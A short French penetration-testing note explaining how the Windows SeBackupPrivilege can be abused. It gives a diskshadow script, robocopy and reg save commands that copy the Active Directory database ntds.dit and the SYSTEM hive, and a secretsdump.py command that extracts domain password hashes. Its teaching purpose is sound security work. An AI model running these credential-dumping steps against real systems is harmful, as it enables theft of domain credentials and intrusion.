SeBackupPrivilege

Description

SeBackupPrivilege permet de sauvegarder des fichiers et répertoires en demandant à NTFS d'octroyer l'accès suivant à tous les fichiers ou répertoires, quel que soit le descripteur de sécurité présent. (utilise diskshadow)

• READ_CONTROL

• ACCESS_SYSTEM_SECURITY

• FILE_GENERIC_READ

• FILE_TRAVERSE

Qu'est ce que Diskshadow ?

Diskshadow.exe est un outil qui expose les fonctionnalités offertes par le service de cliché instantané des volumes (VSS). Par défaut, DiskShadow utilise un interpréteur de commandes interactif semblable à celui de DiskRAID ou diskpart. DiskShadow comprend également un mode scriptable.

ressource:

Le fichier ntds.dit ne peut pas être copié directement à partir du chemin. Parce que lorsqu'un fichier est en utilisé alors il n'est pas possible de le copier. Par conséquent, nous utilisons diskshadow qui nous aide à créer une copie d'un lecteur (C:) actuellement utilisé. Et, à partir du clone du lecteur, nous pouvons copier le fichier ntds.dit.

Exploitation

Créer un fichier "ine.txt" et définir les instructions pour copier le lecteur C:\ dans le lecteur E: avec un alias.

“”
set verbose onX
set metadata C:\Windows\Temp\meta.cabX
set context clientaccessibleX
set context persistentX
begin backupX
add volume C: alias ineX
createX
expose %ine% E:X
end backupX
“”

Ensuite, convertir le fichier .txt au format Unix avec dos2unix par exemple (dos2unix ine.txt)

Placer le fichier créé dans la machine cible puis entrer les commandes suivantes:

1. diskshadow /s ine.txt

2. robocopy /b e:\windows\ntds . ntds.dit

Ensuite, récupérer le fichier système des registres avec la commande:

reg save hklm\system c:\path\to\save\copy

L'étape suivante consiste à extraire ce fichier vers la machine attaquant pour pouvoir en extraire les hash. Pour cela on va utiliser secretdump.py de la suite impacket.

$ secretsdump.py -ntds /root/ntds.dit -system /root/system LOCAL